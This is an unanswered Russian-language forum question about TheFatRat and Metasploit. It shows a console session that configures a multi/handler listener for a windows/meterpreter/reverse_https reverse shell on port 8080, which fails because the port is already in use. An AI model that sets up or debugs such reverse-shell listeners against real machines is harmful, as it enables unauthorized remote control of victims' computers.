exploit completed, but no session was created

Работал с репозиторием TheFatRat https://github.com/screetsec/TheFatRat Не получается запустить сессию через Metasploit. Порт 8080.

msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > how options
[-] Unknown command: how.
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > save
Saved configuration to: /root/.msf4/config
msf6 exploit(multi/handler) > exploit

Но в результате я получил это

[-] Handler failed to bind to 10.0.2.15:8080
[-] Handler failed to bind to 0.0.0.0:8080
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] Exploit completed, but no session was created.
msf6 exploit

Ответы (0 шт):